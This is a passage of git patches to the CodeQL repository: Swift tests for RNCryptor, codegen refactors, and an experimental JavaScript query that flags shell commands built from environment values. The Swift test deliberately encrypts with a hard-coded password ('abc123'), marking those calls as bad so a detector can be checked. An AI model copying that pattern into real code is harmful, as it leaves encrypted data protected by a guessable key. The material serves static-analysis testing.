{SwiftMatcher} + return { + SwiftMatcher, + CreatePatternMatcher({'^lsregister$'}, MatchCompilerName, nil, + {trace = false}), + } end -- Return a list of minimum supported versions of the configuration file format From 449ebb8a12a83bbcd9824c4e13eb29b1bb03e363 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Mon, 16 Jan 2023 14:31:47 +0000 Subject: [PATCH 304/381] Swift: Add tests for RNCryptor library. --- .../Security/CWE-259/rncryptor.swift | 109 ++++++++++++++++++ 1 file changed, 109 insertions(+) create mode 100644 swift/ql/test/query-tests/Security/CWE-259/rncryptor.swift diff --git a/swift/ql/test/query-tests/Security/CWE-259/rncryptor.swift b/swift/ql/test/query-tests/Security/CWE-259/rncryptor.swift new file mode 100644 index 00000000000..5becfb69643 --- /dev/null +++ b/swift/ql/test/query-tests/Security/CWE-259/rncryptor.swift @@ -0,0 +1,109 @@ + +// --- stubs --- + +class Data { + init(_ elements: S) {} +} + +class NSObject +{ +} + +struct _RNCryptorSettings { + // ... +} +typealias RNCryptorSettings = _RNCryptorSettings + +let kRNCryptorAES256Settings = RNCryptorSettings() + +struct _RNCryptorKeyDerivationSettings { + // ... +} +typealias RNCryptorKeyDerivationSettings = _RNCryptorKeyDerivationSettings + +typealias RNCryptorHandler = () -> Void // simplified + +class RNCryptor : NSObject +{ + func key(forPassword password: String?, salt: Data?, settings keySettings: RNCryptorKeyDerivationSettings) -> Data? { return nil } + func keyForPassword(_ password: String?, salt: Data?, settings keySettings: RNCryptorKeyDerivationSettings) -> Data? { return nil } +} + +class RNEncryptor : RNCryptor +{ + override init() {} + + init(settings: RNCryptorSettings, password: String?, handler: RNCryptorHandler?) {} + init(settings: RNCryptorSettings, password: String, iv anIV: Data?, encryptionSalt anEncryptionSalt: Data?, hmacSalt anHMACSalt: Data?, handler: RNCryptorHandler?) {} + init(settings: RNCryptorSettings, password: String, IV anIV: Data?, encryptionSalt anEncryptionSalt: Data?, HMACSalt anHMACSalt: Data?, handler: RNCryptorHandler?) {} + + func encryptData(_ data: Data?, with settings: RNCryptorSettings, password: String?) throws -> Data { return Data(0) } + func encryptData(_ data: Data?, withSettings settings: RNCryptorSettings, password: String?) throws -> Data { return Data(0) } + func encryptData(_ data: Data?, with settings: RNCryptorSettings, password: String?, iv anIV: Data?, encryptionSalt anEncryptionSalt: Data?, hmacSalt anHMACSalt: Data?) throws -> Data { return Data(0) } + func encryptData(_ data: Data?, withSettings settings: RNCryptorSettings, password: String?, IV anIV: Data?, encryptionSalt anEncryptionSalt: Data?, HMACSalt anHMACSalt: Data?) throws -> Data { return Data(0) } +} + +class RNDecryptor : RNCryptor +{ + override init() {} + + init(password: String?, handler: RNCryptorHandler?) {} + + func decryptData(_ data: Data?, withPassword password: String?) throws -> Data { return Data(0) } + func decryptData(_ theCipherText: Data?, withSettings settings: RNCryptorSettings, password aPassword: String?) throws -> Data { return Data(0) } +} + +// --- tests --- + +func getARandomPassword() -> String { + let charset = "abcdefghijklmnopqrstuvwxyz1234567890" + return String("............".map{_ in charset.randomElement()!}) +} + +func test(cond: Bool) { + let myEncryptor = RNEncryptor() + let myDecryptor = RNDecryptor() + let myData = Data(0) + + let myRandomPassword = getARandomPassword() + let myConstPassword = "abc123" + let myMaybePassword = cond ? myRandomPassword : myConstPassword + + // reasonable usage + + let a = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myRandomPassword) // GOOD + let _ = try? myDecryptor.decryptData(a, withPassword: myRandomPassword) // GOOD + + let b = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword) // BAD [NOT DETECTED] + let _ = try? myDecryptor.decryptData(b, withPassword: myConstPassword) // BAD [NOT DETECTED] + + let c = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myMaybePassword) // BAD [NOT DETECTED] + let _ = try? myDecryptor.decryptData(c, withPassword: myMaybePassword) // BAD [NOT DETECTED] + + // all methods + + let myKeyDerivationSettings = RNCryptorKeyDerivationSettings() + let myHandler = {} + let myIV = Data(0) + let mySalt = Data(0) + let mySalt2 = Data(0) + + let _ = myEncryptor.key(forPassword: myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD [NOT DETECTED] + let _ = myEncryptor.keyForPassword(myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD [NOT DETECTED] + let _ = myDecryptor.key(forPassword: myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD [NOT DETECTED] + let _ = myDecryptor.keyForPassword(myConstPassword, salt: mySalt, settings: myKeyDerivationSettings) // BAD [NOT DETECTED] + + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, handler: myHandler) // BAD [NOT DETECTED] + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, iv: myIV, encryptionSalt: mySalt, hmacSalt: mySalt2, handler: myHandler) // BAD [NOT DETECTED] + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myConstPassword, IV: myIV, encryptionSalt: mySalt, HMACSalt: mySalt2, handler: myHandler) // BAD [NOT DETECTED] + + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword) // BAD [NOT DETECTED] + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword) // BAD [NOT DETECTED] + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myConstPassword, iv: myIV, encryptionSalt: mySalt, hmacSalt: mySalt2) // BAD [NOT DETECTED] + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword, IV: myIV, encryptionSalt: mySalt, HMACSalt: mySalt2) // BAD [NOT DETECTED] + + let _ = RNDecryptor(password: myConstPassword, handler: myHandler) // BAD [NOT DETECTED] + + let _ = try? myDecryptor.decryptData(myData, withPassword: myConstPassword) // BAD [NOT DETECTED] + let _ = try? myDecryptor.decryptData(myData, withSettings: kRNCryptorAES256Settings, password: myConstPassword) // BAD [NOT DETECTED] +} From cdc99b52401ed8079d2286ba033f359c0ee106dd Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 17 Jan 2023 10:10:02 +0100 Subject: [PATCH 305/381] Swift: simplify pragma definition --- swift/codegen/lib/schema/defs.py | 50 +++++++++++++++++--------------- 1 file changed, 26 insertions(+), 24 deletions(-) diff --git a/swift/codegen/lib/schema/defs.py b/swift/codegen/lib/schema/defs.py index 8a78bdc2f49..d022da944e6 100644 --- a/swift/codegen/lib/schema/defs.py +++ b/swift/codegen/lib/schema/defs.py @@ -35,6 +35,19 @@ def include(source: str): "__includes", []).append(source) +class _Namespace: + """ simple namespacing mechanism """ + + def __init__(self, **kwargs): + self.__dict__.update(kwargs) + + +qltest = _Namespace() +ql = _Namespace() +cpp = _Namespace() +synth = _Namespace() + + @_dataclass class _Pragma(_schema.PropertyModifier): """ A class or property pragma. @@ -43,6 +56,10 @@ class _Pragma(_schema.PropertyModifier): """ pragma: str + def __post_init__(self): + namespace, _, name = self.pragma.partition('_') + setattr(globals()[namespace], name, self) + def modify(self, prop: _schema.Property): prop.pragmas.append(self.pragma) @@ -86,13 +103,6 @@ class _TypeModifier: return item | self.modifier -class _Namespace: - """ simple namespacing mechanism """ - - def __init__(self, **kwargs): - self.__dict__.update(kwargs) - - _ClassDecorator = _Callable[[type], type] @@ -119,28 +129,20 @@ desc = _DescModifier use_for_null = _annotate(null=True) -qltest = _Namespace( - skip=_Pragma("qltest_skip"), - collapse_hierarchy=_Pragma("qltest_collapse_hierarchy"), - uncollapse_hierarchy=_Pragma("qltest_uncollapse_hierarchy"), -) +_Pragma("qltest_skip") +_Pragma("qltest_collapse_hierarchy") +_Pragma("qltest_uncollapse_hierarchy") -ql = _Namespace( - default_doc_name=lambda doc: _annotate(doc_name=doc) -) +ql.default_doc_name = lambda doc: _annotate(doc_name=doc) -cpp = _Namespace( - skip=_Pragma("cpp_skip"), -) +_Pragma("cpp_skip") def group(name: str = "") -> _ClassDecorator: return _annotate(group=name) -synth = _Namespace( - from_class=lambda ref: _annotate(ipa=_schema.IpaInfo( - from_class=_schema.get_type_name(ref))), - on_arguments=lambda **kwargs: _annotate( - ipa=_schema.IpaInfo(on_arguments={k: _schema.get_type_name(t) for k, t in kwargs.items()})) -) +synth.from_class = lambda ref: _annotate(ipa=_schema.IpaInfo( + from_class=_schema.get_type_name(ref))) +synth.on_arguments = lambda **kwargs: _annotate( + ipa=_schema.IpaInfo(on_arguments={k: _schema.get_type_name(t) for k, t in kwargs.items()})) From 48825442c3b205cbeb1fb601871fe8cd164ac7ea Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 17 Jan 2023 10:10:35 +0100 Subject: [PATCH 306/381] Swift: add `ql.internal` pragma in schema definitions --- swift/codegen/lib/schema/defs.py | 1 + swift/codegen/test/test_schema.py | 1 + 2 files changed, 2 insertions(+) diff --git a/swift/codegen/lib/schema/defs.py b/swift/codegen/lib/schema/defs.py index d022da944e6..d972e5a63e5 100644 --- a/swift/codegen/lib/schema/defs.py +++ b/swift/codegen/lib/schema/defs.py @@ -134,6 +134,7 @@ _Pragma("qltest_collapse_hierarchy") _Pragma("qltest_uncollapse_hierarchy") ql.default_doc_name = lambda doc: _annotate(doc_name=doc) +_Pragma("ql_internal") _Pragma("cpp_skip") diff --git a/swift/codegen/test/test_schema.py b/swift/codegen/test/test_schema.py index 0171087fafb..b5f5f7d1c1a 100644 --- a/swift/codegen/test/test_schema.py +++ b/swift/codegen/test/test_schema.py @@ -265,6 +265,7 @@ _pragmas = [(defs.qltest.skip, "qltest_skip"), (defs.qltest.collapse_hierarchy, "qltest_collapse_hierarchy"), (defs.qltest.uncollapse_hierarchy, "qltest_uncollapse_hierarchy"), (defs.cpp.skip, "cpp_skip"), + (defs.ql.internal, "ql_internal"), ] From b22da25e05990646aa8ce1e057e44781f3e4d92a Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 17 Jan 2023 10:18:03 +0100 Subject: [PATCH 307/381] Swift: remove `ql.internal` classes from global import --- swift/codegen/generators/qlgen.py | 3 ++- swift/codegen/lib/ql.py | 1 + swift/codegen/test/test_qlgen.py | 9 +++++++++ 3 files changed, 12 insertions(+), 1 deletion(-) diff --git a/swift/codegen/generators/qlgen.py b/swift/codegen/generators/qlgen.py index de38984caa7..8a5138cb7d5 100755 --- a/swift/codegen/generators/qlgen.py +++ b/swift/codegen/generators/qlgen.py @@ -327,7 +327,8 @@ def generate(opts, renderer): renderer.render(stub, stub_file) # for example path/to/elements -> path/to/elements.qll - renderer.render(ql.ImportList(list(imports.values())), include_file) + renderer.render(ql.ImportList([i for name, i in imports.items() if not classes[name].ql_internal]), + include_file) renderer.render(ql.GetParentImplementation(list(classes.values())), out / 'ParentChild.qll') diff --git a/swift/codegen/lib/ql.py b/swift/codegen/lib/ql.py index db293c8706f..34a0ede152d 100644 --- a/swift/codegen/lib/ql.py +++ b/swift/codegen/lib/ql.py @@ -100,6 +100,7 @@ class Class: qltest_skip: bool = False qltest_collapse_hierarchy: bool = False qltest_uncollapse_hierarchy: bool = False + ql_internal: bool = False ipa: bool = False doc: List[str] = field(default_factory=list) diff --git a/swift/codegen/test/test_qlgen.py b/swift/codegen/test/test_qlgen.py index 67a6cf36468..ad05a33e7bc 100644 --- a/swift/codegen/test/test_qlgen.py +++ b/swift/codegen/test/test_qlgen.py @@ -170,6 +170,15 @@ def test_hierarchy_imports(generate_import_list): ]) == ql.ImportList([stub_import_prefix + cls for cls in "ABCD"]) +def test_internal_not_in_import_list(generate_import_list): + assert generate_import_list([ + schema.Class("D", bases=["B", "C"]), + schema.Class("C", bases=["A"], derived={"D"}, pragmas=["ql_internal"]), + schema.Class("B", bases=["A"], derived={"D"}), + schema.Class("A", derived={"B", "C"}, pragmas=["ql_internal"]), + ]) == ql.ImportList([stub_import_prefix + cls for cls in "BD"]) + + def test_hierarchy_children(generate_children_implementations): assert generate_children_implementations([ schema.Class("A", derived={"B", "C"}), From 6106edd5e2bca998e8f25a035ae03fee6503a9cc Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 17 Jan 2023 10:30:59 +0100 Subject: [PATCH 308/381] Swift: add `INTERNAL` doc marker to `ql.internal` classes --- swift/codegen/lib/ql.py | 2 +- swift/codegen/templates/ql_class.mustache | 3 +++ swift/codegen/templates/ql_stub.mustache | 5 +++++ swift/codegen/test/test_ql.py | 18 ++++++++++-------- 4 files changed, 19 insertions(+), 9 deletions(-) diff --git a/swift/codegen/lib/ql.py b/swift/codegen/lib/ql.py index 34a0ede152d..8ae533be756 100644 --- a/swift/codegen/lib/ql.py +++ b/swift/codegen/lib/ql.py @@ -131,7 +131,7 @@ class Class: @property def has_doc(self) -> bool: - return bool(self.doc) + return bool(self.doc) or self.ql_internal @dataclass diff --git a/swift/codegen/templates/ql_class.mustache b/swift/codegen/templates/ql_class.mustache index 2d7a6f247c0..66178003dcd 100644 --- a/swift/codegen/templates/ql_class.mustache +++ b/swift/codegen/templates/ql_class.mustache @@ -11,6 +11,9 @@ module Generated { {{#doc}} * {{.}} {{/doc}} + {{#ql_internal}} + * INTERNAL: Do not use. + {{/ql_internal}} */ {{/has_doc}} class {{name}} extends Synth::T{{name}}{{#bases}}, {{.}}{{/bases}} { diff --git a/swift/codegen/templates/ql_stub.mustache b/swift/codegen/templates/ql_stub.mustache index ea6c3a997fe..d15127d9870 100644 --- a/swift/codegen/templates/ql_stub.mustache +++ b/swift/codegen/templates/ql_stub.mustache @@ -1,4 +1,9 @@ // generated by {{generator}}, remove this comment if you wish to edit this file private import {{base_import}} +{{#ql_internal}} +/** + * INTERNAL: Do not use. + */ +{{/ql_internal}} class {{name}} extends Generated::{{name}} {} diff --git a/swift/codegen/test/test_ql.py b/swift/codegen/test/test_ql.py index bd98a805d6e..5f5b1aebd73 100644 --- a/swift/codegen/test/test_ql.py +++ b/swift/codegen/test/test_ql.py @@ -127,14 +127,16 @@ def test_class_with_children(): assert cls.has_children is True -def test_class_with_doc(): - cls = ql.Class("Class", doc=["foo", "bar"]) - assert cls.has_doc is True - - -def test_class_without_doc(): - cls = ql.Class("Class", doc=[]) - assert cls.has_doc is False +@pytest.mark.parametrize("doc,ql_internal,expected", + [ + (["foo", "bar"], False, True), + (["foo", "bar"], True, True), + ([], False, False), + ([], True, True), + ]) +def test_has_doc(doc, ql_internal, expected): + cls = ql.Class("Class", doc=doc, ql_internal=ql_internal) + assert cls.has_doc is expected def test_property_with_description(): From 13aaa22df5d9039369ed6ff5374d72137abe2455 Mon Sep 17 00:00:00 2001 From: Jean Helie Date: Fri, 16 Dec 2022 17:20:20 +0100 Subject: [PATCH 309/381] add bosted version of ShellCommandInjectionFromEnvironment --- .../EndpointCharacteristics.qll | 22 ++++++++++++++ .../adaptivethreatmodeling/EndpointTypes.qll | 11 ++++++- ...hellCommandInjectionFromEnvironmentATM.qll | 30 +++++++++++++++++++ .../modelbuilding/DebugResultInclusion.ql | 6 ++++ .../ExtractEndpointDataTraining.qll | 5 ++++ .../extraction/ExtractEndpointMapping.ql | 5 ++++ .../modelbuilding/extraction/Queries.qll | 8 ++++- ...ShellCommandInjectionFromEnvironmentATM.ql | 29 ++++++++++++++++++ .../endpoint_large_scale/EndpointFeatures.ql | 5 ++++ .../ExtractEndpointDataInference.ql | 1 + .../FilteredTruePositives.ql | 12 ++++++++ 11 files changed, 132 insertions(+), 2 deletions(-) create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/ShellCommandInjectionFromEnvironmentATM.qll create mode 100644 javascript/ql/experimental/adaptivethreatmodeling/src/ShellCommandInjectionFromEnvironmentATM.ql diff --git a/javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/EndpointCharacteristics.qll b/javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/EndpointCharacteristics.qll index e95b2785ceb..160c81f8acd 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/EndpointCharacteristics.qll +++ b/javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/EndpointCharacteristics.qll @@ -278,6 +278,28 @@ private class NosqlInjectionSinkCharacteristic extends EndpointCharacteristic { } } +/** + * Endpoints identified as "ShellCommandInjectionFromEnvironmentSink" by the standard JavaScript libraries are + * ShellCommandInjectionFromEnvironment sinks with maximal confidence. + */ +private class ShellCommandInjectionFromEnvironmentSinkCharacteristic extends EndpointCharacteristic { + ShellCommandInjectionFromEnvironmentSinkCharacteristic() { + this = "ShellCommandInjectionFromEnvironmentSink" + } + + override predicate appliesToEndpoint(DataFlow::Node n) { + n instanceof ShellCommandInjectionFromEnvironment::Sink + } + + override predicate hasImplications( + EndpointType endpointClass, boolean isPositiveIndicator, float confidence + ) { + endpointClass instanceof ShellCommandInjectionFromEnvironmentSinkType and + isPositiveIndicator = true and + confidence = maximalConfidence() + } +} + /* * Characteristics that are indicative of not being a sink of any type, and have historically been used to select * negative samples for training. diff --git a/javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/EndpointTypes.qll b/javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/EndpointTypes.qll index d2cc37b1b33..ade9f9ed99d 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/EndpointTypes.qll +++ b/javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/EndpointTypes.qll @@ -10,7 +10,8 @@ newtype TEndpointType = TXssSinkType() or TNosqlInjectionSinkType() or TSqlInjectionSinkType() or - TTaintedPathSinkType() + TTaintedPathSinkType() or + TShellCommandInjectionFromEnvironmentSinkType() /** A class that can be predicted by endpoint scoring models. */ abstract class EndpointType extends TEndpointType { @@ -60,3 +61,11 @@ class TaintedPathSinkType extends EndpointType, TTaintedPathSinkType { override int getEncoding() { result = 4 } } + +/** The `ShellCommandInjectionFromEnvironmentSink` class that can be predicted by endpoint scoring models. */ +class ShellCommandInjectionFromEnvironmentSinkType extends EndpointType, + TShellCommandInjectionFromEnvironmentSinkType { + override string getDescription() { result = "ShellCommandInjectionFromEnvironmentSink" } + + override int getEncoding() { result = 5 } +} diff --git a/javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/ShellCommandInjectionFromEnvironmentATM.qll b/javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/ShellCommandInjectionFromEnvironmentATM.qll new file mode 100644 index 00000000000..06ae4dc7239 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/lib/experimental/adaptivethreatmodeling/ShellCommandInjectionFromEnvironmentATM.qll @@ -0,0 +1,30 @@ +/** + * For internal use only. + * + * A taint-tracking configuration for reasoning about command-injection + * vulnerabilities. + * Defines shared code used by the ShellCommandInjectionFromEnvironment boosted query. + */ + +private import semmle.javascript.heuristics.SyntacticHeuristics +private import semmle.javascript.security.dataflow.ShellCommandInjectionFromEnvironmentCustomizations::ShellCommandInjectionFromEnvironment as ShellCommandInjectionFromEnvironment +import AdaptiveThreatModeling + +class ShellCommandInjectionFromEnvironmentAtmConfig extends AtmConfig { + ShellCommandInjectionFromEnvironmentAtmConfig() { + this = "ShellCommandInjectionFromEnvironmentAtmConfig" + } + + override predicate isKnownSource(DataFlow::Node source) { + source instanceof ShellCommandInjectionFromEnvironment::Source + } + + override EndpointType getASinkEndpointType() { + result instanceof ShellCommandInjectionFromEnvironmentSinkType + } + + override predicate isSanitizer(DataFlow::Node node) { + super.isSanitizer(node) or + node instanceof ShellCommandInjectionFromEnvironment::Sanitizer + } +} diff --git a/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/DebugResultInclusion.ql b/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/DebugResultInclusion.ql index ac2f2f1d817..efccae3364d 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/DebugResultInclusion.ql +++ b/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/DebugResultInclusion.ql @@ -17,6 +17,7 @@ private import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjecti private import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm private import experimental.adaptivethreatmodeling.XssATM as XssAtm private import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm +private import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm string getAReasonSinkExcluded(DataFlow::Node sinkCandidate, Query query) { query instanceof NosqlInjectionQuery and @@ -33,6 +34,11 @@ string getAReasonSinkExcluded(DataFlow::Node sinkCandidate, Query query) { or query instanceof XssThroughDomQuery and result = any(XssThroughDomAtm::XssThroughDomAtmConfig cfg).getAReasonSinkExcluded(sinkCandidate) + or + query instanceof ShellCommandInjectionFromEnvironmentQuery and + result = + any(ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig cfg) + .getAReasonSinkExcluded(sinkCandidate) } pragma[inline] diff --git a/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/ExtractEndpointDataTraining.qll b/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/ExtractEndpointDataTraining.qll index 763c74c7cf3..d224be010bd 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/ExtractEndpointDataTraining.qll +++ b/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/ExtractEndpointDataTraining.qll @@ -15,6 +15,7 @@ private import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjecti private import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm private import experimental.adaptivethreatmodeling.XssATM as XssAtm private import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm +private import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm /** * Gets the set of featureName-featureValue pairs for each endpoint in the training set. @@ -217,6 +218,10 @@ DataFlow::Configuration getDataFlowCfg(Query query) { query instanceof XssQuery and result instanceof XssAtm::DomBasedXssAtmConfig or query instanceof XssThroughDomQuery and result instanceof XssThroughDomAtm::XssThroughDomAtmConfig + or + query instanceof ShellCommandInjectionFromEnvironmentQuery and + result instanceof + ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig } // TODO: Delete this once we are no longer surfacing `hasFlowFromSource`. diff --git a/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/ExtractEndpointMapping.ql b/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/ExtractEndpointMapping.ql index 57c536eac12..1fb6441e1a9 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/ExtractEndpointMapping.ql +++ b/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/ExtractEndpointMapping.ql @@ -9,6 +9,7 @@ import experimental.adaptivethreatmodeling.NosqlInjectionATM as NosqlInjectionAt import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm import experimental.adaptivethreatmodeling.XssATM as XssAtm import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm +import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm import experimental.adaptivethreatmodeling.AdaptiveThreatModeling from string queryName, AtmConfig c, EndpointType e @@ -26,6 +27,10 @@ where queryName = "Xss" and c instanceof XssAtm::DomBasedXssAtmConfig or queryName = "XssThroughDom" and c instanceof XssThroughDomAtm::XssThroughDomAtmConfig + or + queryName = "ShellCommandInjectionFromEnvironment" and + c instanceof + ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig ) and e = c.getASinkEndpointType() select queryName, e.getEncoding() as label diff --git a/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/Queries.qll b/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/Queries.qll index a75e01b99cd..a84872c4ee4 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/Queries.qll +++ b/javascript/ql/experimental/adaptivethreatmodeling/modelbuilding/extraction/Queries.qll @@ -9,7 +9,8 @@ newtype TQuery = TSqlInjectionQuery() or TTaintedPathQuery() or TXssQuery() or - TXssThroughDomQuery() + TXssThroughDomQuery() or + TShellCommandInjectionFromEnvironmentQuery() abstract class Query extends TQuery { abstract string getName(); @@ -36,3 +37,8 @@ class XssQuery extends Query, TXssQuery { class XssThroughDomQuery extends Query, TXssThroughDomQuery { override string getName() { result = "XssThroughDom" } } + +class ShellCommandInjectionFromEnvironmentQuery extends Query, + TShellCommandInjectionFromEnvironmentQuery { + override string getName() { result = "ShellCommandInjectionFromEnvironment" } +} diff --git a/javascript/ql/experimental/adaptivethreatmodeling/src/ShellCommandInjectionFromEnvironmentATM.ql b/javascript/ql/experimental/adaptivethreatmodeling/src/ShellCommandInjectionFromEnvironmentATM.ql new file mode 100644 index 00000000000..e2de0be9238 --- /dev/null +++ b/javascript/ql/experimental/adaptivethreatmodeling/src/ShellCommandInjectionFromEnvironmentATM.ql @@ -0,0 +1,29 @@ +/** + * For internal use only. + * + * @name Shell command built from environment values + * @description Building a shell command string with values from the enclosing + * environment may cause subtle bugs or vulnerabilities. + * @kind path-problem + * @scored + * @problem.severity warning + * @security-severity 6.3 + * @precision high + * @id js/ml-powered/shell-command-injection-from-environment + * @tags experimental security + * correctness + * security + * external/cwe/cwe-078 + * external/cwe/cwe-088 + */ + +import javascript +import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM +import ATM::ResultsInfo +import DataFlow::PathGraph + +from AtmConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink, float score +where cfg.hasBoostedFlowPath(source, sink, score) +select sink.getNode(), source, sink, + "(Experimental) This shell command depends on $@. Identified using machine learning.", + source.getNode(), "an uncontrolled value", score diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/EndpointFeatures.ql b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/EndpointFeatures.ql index 741e8bf8482..099de007aa2 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/EndpointFeatures.ql +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/EndpointFeatures.ql @@ -12,6 +12,7 @@ import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjectionAtm import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm import experimental.adaptivethreatmodeling.XssATM as XssAtm import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm +import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm import experimental.adaptivethreatmodeling.EndpointFeatures as EndpointFeatures import extraction.NoFeaturizationRestrictionsConfig private import experimental.adaptivethreatmodeling.EndpointCharacteristics as EndpointCharacteristics @@ -23,6 +24,10 @@ query predicate tokenFeatures(DataFlow::Node endpoint, string featureName, strin not exists(any(TaintedPathAtm::TaintedPathAtmConfig cfg).getAReasonSinkExcluded(endpoint)) or not exists(any(XssAtm::DomBasedXssAtmConfig cfg).getAReasonSinkExcluded(endpoint)) or not exists(any(XssThroughDomAtm::XssThroughDomAtmConfig cfg).getAReasonSinkExcluded(endpoint)) or + not exists( + any(ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig cfg) + .getAReasonSinkExcluded(endpoint) + ) or any(EndpointCharacteristics::IsArgumentToModeledFunctionCharacteristic characteristic) .appliesToEndpoint(endpoint) ) and diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/ExtractEndpointDataInference.ql b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/ExtractEndpointDataInference.ql index 73e68b4f597..90af9698e44 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/ExtractEndpointDataInference.ql +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/ExtractEndpointDataInference.ql @@ -19,6 +19,7 @@ private import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjecti private import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm private import experimental.adaptivethreatmodeling.XssATM as XssAtm private import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm +private import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm query predicate isSinkCandidateForQuery( AtmConfig::AtmConfig queryConfig, JS::DataFlow::PathNode sink diff --git a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/FilteredTruePositives.ql b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/FilteredTruePositives.ql index 0e382df6ba9..4dc7fb8d1dc 100644 --- a/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/FilteredTruePositives.ql +++ b/javascript/ql/experimental/adaptivethreatmodeling/test/endpoint_large_scale/FilteredTruePositives.ql @@ -16,11 +16,13 @@ import semmle.javascript.security.dataflow.NosqlInjectionCustomizations import semmle.javascript.security.dataflow.SqlInjectionCustomizations import semmle.javascript.security.dataflow.TaintedPathCustomizations import semmle.javascript.security.dataflow.DomBasedXssCustomizations +import semmle.javascript.security.dataflow.ShellCommandInjectionFromEnvironmentCustomizations import experimental.adaptivethreatmodeling.NosqlInjectionATM as NosqlInjectionAtm 